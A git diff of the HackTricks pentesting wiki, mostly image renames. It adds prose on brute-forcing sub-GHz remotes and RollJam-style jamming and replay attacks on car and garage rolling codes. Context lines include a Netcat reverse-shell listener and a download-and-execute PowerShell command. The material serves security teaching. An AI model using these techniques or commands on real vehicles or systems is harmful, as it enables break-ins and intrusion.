diff --git a/.gitbook/assets/image (2) (6) (2).png b/.gitbook/assets/image (2) (6) (2).png
new file mode 100644
index 00000000..aa2d624c
Binary files /dev/null and b/.gitbook/assets/image (2) (6) (2).png differ
diff --git a/.gitbook/assets/image (2) (6).png b/.gitbook/assets/image (2) (6).png
index aa2d624c..5109dd9b 100644
Binary files a/.gitbook/assets/image (2) (6).png and b/.gitbook/assets/image (2) (6).png differ
diff --git a/.gitbook/assets/image (2).png b/.gitbook/assets/image (2).png
index 5109dd9b..8cbefda2 100644
Binary files a/.gitbook/assets/image (2).png and b/.gitbook/assets/image (2).png differ
diff --git a/.gitbook/assets/image (3) (1) (4).png b/.gitbook/assets/image (3) (1) (4).png
new file mode 100644
index 00000000..7ed352b6
Binary files /dev/null and b/.gitbook/assets/image (3) (1) (4).png differ
diff --git a/.gitbook/assets/image (3) (1).png b/.gitbook/assets/image (3) (1).png
index 7ed352b6..c65f8a06 100644
Binary files a/.gitbook/assets/image (3) (1).png and b/.gitbook/assets/image (3) (1).png differ
diff --git a/.gitbook/assets/image (3).png b/.gitbook/assets/image (3).png
index c65f8a06..884a59fd 100644
Binary files a/.gitbook/assets/image (3).png and b/.gitbook/assets/image (3).png differ
diff --git a/.gitbook/assets/image (4) (5) (1).png b/.gitbook/assets/image (4) (5) (1).png
new file mode 100644
index 00000000..efc07ea7
Binary files /dev/null and b/.gitbook/assets/image (4) (5) (1).png differ
diff --git a/.gitbook/assets/image (4) (5).png b/.gitbook/assets/image (4) (5).png
index efc07ea7..786ef209 100644
Binary files a/.gitbook/assets/image (4) (5).png and b/.gitbook/assets/image (4) (5).png differ
diff --git a/.gitbook/assets/image (4).png b/.gitbook/assets/image (4).png
index 786ef209..1ad2a58a 100644
Binary files a/.gitbook/assets/image (4).png and b/.gitbook/assets/image (4).png differ
diff --git a/.gitbook/assets/image (5) (4).png b/.gitbook/assets/image (5) (4).png
new file mode 100644
index 00000000..63d09319
Binary files /dev/null and b/.gitbook/assets/image (5) (4).png differ
diff --git a/.gitbook/assets/image (5).png b/.gitbook/assets/image (5).png
index 63d09319..8d941766 100644
Binary files a/.gitbook/assets/image (5).png and b/.gitbook/assets/image (5).png differ
diff --git a/.gitbook/assets/image.png b/.gitbook/assets/image.png
index 884a59fd..ae902527 100644
Binary files a/.gitbook/assets/image.png and b/.gitbook/assets/image.png differ
diff --git a/linux-hardening/freeipa-pentesting.md b/linux-hardening/freeipa-pentesting.md
index 112f604d..5cc85c10 100644
--- a/linux-hardening/freeipa-pentesting.md
+++ b/linux-hardening/freeipa-pentesting.md
@@ -96,7 +96,7 @@ CCACHE Tickets \*\*\*\* can also be **stored** in \*\*\*\* the Linux **keyring**
Depending on how the administrator scoped the ticket stored inside of the Unix keyring, parsing it out may be difficult. However, the **default** **scope** for CCACHE Tickets in the Unix keyring is **`KEYRING:persistent:uidnumber`**. Fortunately if you are in the **context** of the **user**, `klist` can **parse** this information for us.
-
+
As an attacker, **re-using a CCACHE** Ticket stored in the Unix **keyring** is fairly **difficult** depending on how the ticket is scoped. Fortunately [@Zer1t0](https://github.com/Zer1t0) from [@Tarlogic](https://twitter.com/Tarlogic) has built a tool that can extract Kerberos tickets from the Unix keyring. The tool is called **Tickey** and can be found [**here**](https://github.com/TarlogicSecurity/tickey).
diff --git a/linux-hardening/privilege-escalation/docker-breakout/cgroups.md b/linux-hardening/privilege-escalation/docker-breakout/cgroups.md
index f1d375ae..7ace7c54 100644
--- a/linux-hardening/privilege-escalation/docker-breakout/cgroups.md
+++ b/linux-hardening/privilege-escalation/docker-breakout/cgroups.md
@@ -89,7 +89,7 @@ An exception to these rules is the **root cgroup** found at the bottom of the hi
Even with no controllers enabled, you can see the CPU usage of a cgroup by looking at its cpu.stat file:
-
+
Because this is the accumulated CPU usage over the entire lifespan of the cgroup, you can see how a service consumes processor time even if it spawns many subprocesses that eventually terminate.
diff --git a/network-services-pentesting/8089-splunkd.md b/network-services-pentesting/8089-splunkd.md
index 5f99cb56..b7eb0f03 100644
--- a/network-services-pentesting/8089-splunkd.md
+++ b/network-services-pentesting/8089-splunkd.md
@@ -2,13 +2,13 @@
-ποΈ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) ποΈ - π₯ Youtube π₯
+ποΈ HackTricks LIVE TwitchWednesdays 5.30pm (UTC) ποΈ -π₯ Youtube π₯
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
@@ -94,7 +94,7 @@ We need the `.bat` file, which will run when the application is deployed and exe
The next step is to choose `Install app from file` and upload the application.
-
+
Before uploading the malicious custom app, let's start a listener using Netcat or [socat](https://linux.die.net/man/1/socat).
@@ -104,7 +104,7 @@ sudo nc -lnvp 443
listening on [any] 443 ...
```
-On the `Upload app` page, click on browse, choose the tarball we created earlier and click `Upload`. **** As **soon as we upload the application**, a **reverse shell is received** as the status of the application will automatically be switched to `Enabled`.
+On the `Upload app` page, click on browse, choose the tarball we created earlier and click `Upload`. \*\*\*\* As **soon as we upload the application**, a **reverse shell is received** as the status of the application will automatically be switched to `Enabled`.
#### Linux
@@ -135,12 +135,12 @@ In the following page you can find an explanation how this service can be abused
-ποΈ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) ποΈ - π₯ Youtube π₯
+ποΈ HackTricks LIVE TwitchWednesdays 5.30pm (UTC) ποΈ -π₯ Youtube π₯
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
diff --git a/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/README.md b/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/README.md
index bb5f7eaf..6feb3b3c 100644
--- a/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/README.md
+++ b/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/README.md
@@ -124,7 +124,7 @@ If the **nodeIntegration** is set to **on**, a web page's JavaScript can use Nod
```
-
+
## RCE: preload
diff --git a/pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.md b/pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.md
index c80b998a..493893c7 100644
--- a/pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.md
+++ b/pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.md
@@ -100,7 +100,7 @@ Then, the attacker could use those **100 connections** to perform a **search bru
Yes, it's possible to generate 100000 temporary files in an EC2 medium size instance:
-
+
## Nginx
diff --git a/todo/radio-hacking/flipper-zero/fz-sub-ghz.md b/todo/radio-hacking/flipper-zero/fz-sub-ghz.md
index fe3e7561..12d7ebc2 100644
--- a/todo/radio-hacking/flipper-zero/fz-sub-ghz.md
+++ b/todo/radio-hacking/flipper-zero/fz-sub-ghz.md
@@ -1,4 +1,4 @@
-# FZ - Sub-Ghz
+# FZ - Sub-GHz
@@ -16,7 +16,7 @@
Flipper Zero can **receive and transmit radio frequencies in the range of 300-928 MHz** with its built-in module, which can read, save, and emulate remote controls. These controls are used for interaction with gates, barriers, radio locks, remote control switches, wireless doorbells, smart lights, and more. Flipper Zero can help you to learn if your security is compromised.
-
+
## Sub-GHz hardware
diff --git a/todo/radio-hacking/sub-ghz-rf.md b/todo/radio-hacking/sub-ghz-rf.md
index 1246ad52..34cc20ca 100644
--- a/todo/radio-hacking/sub-ghz-rf.md
+++ b/todo/radio-hacking/sub-ghz-rf.md
@@ -21,9 +21,33 @@ Garage door openers typically operate at frequencies in the 300-190 MHz range, w
Most car key fobs operate on either **315 MHz or 433 MHz**. These are both radio frequencies, and they are used in a variety of different applications. The main difference between the two frequencies is that 433 MHz has a longer range than 315 MHz. This means that 433 MHz is better for applications that require a longer range, such as remote keyless entry.\
In Europe 433.92MHz is commonly used and in U.S. and Japan it's the 315MHz.
-## Security
+## **Brute-force Attack**
-### Rolling Codes
+
+
+If instead of sending each code 5 times (sent like this to make sure the receiver gets it) so just send it once, the time is reduced to 6mins:
+
+
+
+and if you **remove the 2 ms waiting** period between signals you can **reduce the time to 3minutes.**
+
+Moreover, by using the De Bruijn Sequence (a way to reduce the number of bits needed to send all the potential binary numbers to burteforce) this **time is reduced just to 8 seconds**:
+
+
+
+Example of this attack was implemented in [https://github.com/samyk/opensesame](https://github.com/samyk/opensesame)
+
+Requiring a preamble will avoid the De Bruijn Sequence optimization and rolling codes will prevent this attack.
+
+## Sub-GHz Attack
+
+To attack these signals with Flipper Zero check:
+
+{% content-ref url="flipper-zero/fz-sub-ghz.md" %}
+[fz-sub-ghz.md](flipper-zero/fz-sub-ghz.md)
+{% endcontent-ref %}
+
+## Rolling Codes Protection
Automatic garage door openers typically use a wireless remote control to open and close the garage door. The remote control **sends a radio frequency (RF) signal** to the garage door opener, which activates the motor to open or close the door.
@@ -33,17 +57,40 @@ The **RF signal is typically transmitted using a rolling code**, which means tha
In a rolling code system, the remote control and the garage door opener have a **shared algorithm** that **generates a new code** every time the remote is used. The garage door opener will only respond to the **correct code**, making it much more difficult for someone to gain unauthorised access to the garage just by capturing a code.
-## Attack
+### **Missing Link Attack**
-To attack these signals with Flipper Zero check:
+Basically, you listen for the button and **capture the signal whilst the remote is out of range** of the device (say the car or garage). You then move to the device and **use the captured code to open it**.
-{% content-ref url="flipper-zero/fz-sub-ghz.md" %}
-[fz-sub-ghz.md](flipper-zero/fz-sub-ghz.md)
-{% endcontent-ref %}
+### Full Link Jamming Attack
+
+An attacker could **jam the signal near the vehicle or receive**r so the **receiver cannot actually βhearβ the code**, and once that is happening you can simply **capture and replay** the code when you have stopped jamming.
+
+The victim at some point will use the **keys to lock the car**, but then the attack will have **recorded enough "close door" codes** that hopefully could be resent to open the door (a **change of frequency might be needed** as there are cars that use the same codes to open and close but listens for both commands in different frequencies).
+
+{% hint style="warning" %}
+**Jamming works**, but it's noticeable as if the **person locking the car simply tests the doors** to ensure they are locked they would notice the car unlocked. Additionally if they were aware of such attacks they could even listen to the fact that the doors never made the lock **sound** or the cars **lights** never flashed when they pressed the βlockβ button.
+{% endhint %}
+
+### **Code Grabbing Attack ( aka βRollJamβ )**
+
+This is a more **stealth Jamming technique**. The attacker will jam the signal, so when the victim tries to lock the door it won't work, but the attacker will **record this code**. Then, the victim will **try to lock the car again** pressing the button and the car will **record this second code**.\
+Instantly after this the **attacker can send the first code** and the **car will lock** (victim will think the second press closed it). Then, the attacker will be able to **send the second stolen code to open** the car (supposing that a **"close car" code can also be used to open it**). A change of frequency might be needed (as there are cars that use the same codes to open and close but listens for both commands in different frequencies).
+
+The attacker can **jam the car receiver and not his receiver** because if the car receiver is listening in for example a 1MHz broadband, the attacker won't **jam** the exact frequency used by the remote but **a close one in that spectrum** while the **attackers receiver will be listening in a smaller range** where he can listen the remote signal **without the jam signal**.
+
+{% hint style="warning" %}
+Other implementations seen in specifications show that the **rolling code is a portion** of the total code sent. Ie the code sent is a **24 bit key** where the first **12 are the rolling code**, the **second 8 are the command** (such as lock or unlock) and the last 4 is the **checksum**. Vehicles implementing this type are also naturally susceptible as the attacker merely needs to replace the rolling code segment to be able to **use any rolling code on both frequencies**.
+{% endhint %}
+
+### Alarm Sounding Jamming Attack
+
+Testing against an aftermarket rolling code system installed on a car, **sending the same code twice** immediately **activated the alarm** and immobiliser providing a unique **denial of service** opportunity. Ironically the means of **disabling the alarm** and immobiliser was to **press** the **remote**, providing an attacker with the ability to **continually perform DoS attack**. Or mix this attack with the **previous one to obtain more codes** as the victim would like to stop the attack asap.
## References
* [https://www.americanradioarchives.com/what-radio-frequency-does-car-key-fobs-run-on/](https://www.americanradioarchives.com/what-radio-frequency-does-car-key-fobs-run-on/)
+* [https://www.andrewmohawk.com/2016/02/05/bypassing-rolling-code-systems/](https://www.andrewmohawk.com/2016/02/05/bypassing-rolling-code-systems/)
+* [https://samy.pl/defcon2015/](https://samy.pl/defcon2015/)
diff --git a/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md b/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md
index a2321fcf..ad90a0d8 100644
--- a/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md
+++ b/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md
@@ -116,7 +116,7 @@ winrs -r:http://bizintel:5446 -u:ta\redsuit -p:2600leet hostname
Like `Invoke-Command`, this can be easily scripted so the attacker can simply issue system commands as an argument. A generic batch script example _winrm.bat_:
-
+
### OpenSSH
diff --git a/windows-hardening/av-bypass.md b/windows-hardening/av-bypass.md
index bb2b1824..5bb851e5 100644
--- a/windows-hardening/av-bypass.md
+++ b/windows-hardening/av-bypass.md
@@ -169,7 +169,7 @@ It allows antivirus solutions to inspect script behavior by exposing script cont
Running `IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')` will produce the following alert on Windows Defender.
-
+
Notice how it prepends `amsi:` and then the path to the executable from which the script ran, in this case, powershell.exe
 (1).png)
 (1) (4).png)
.png)
 (6).png)
 (5).png)
 (5) (1).png)
.png)
 (4).png)
.png)
 (1).png)
.png)
.png)
.png)
 (6).png)
 (6) (2).png)
.png)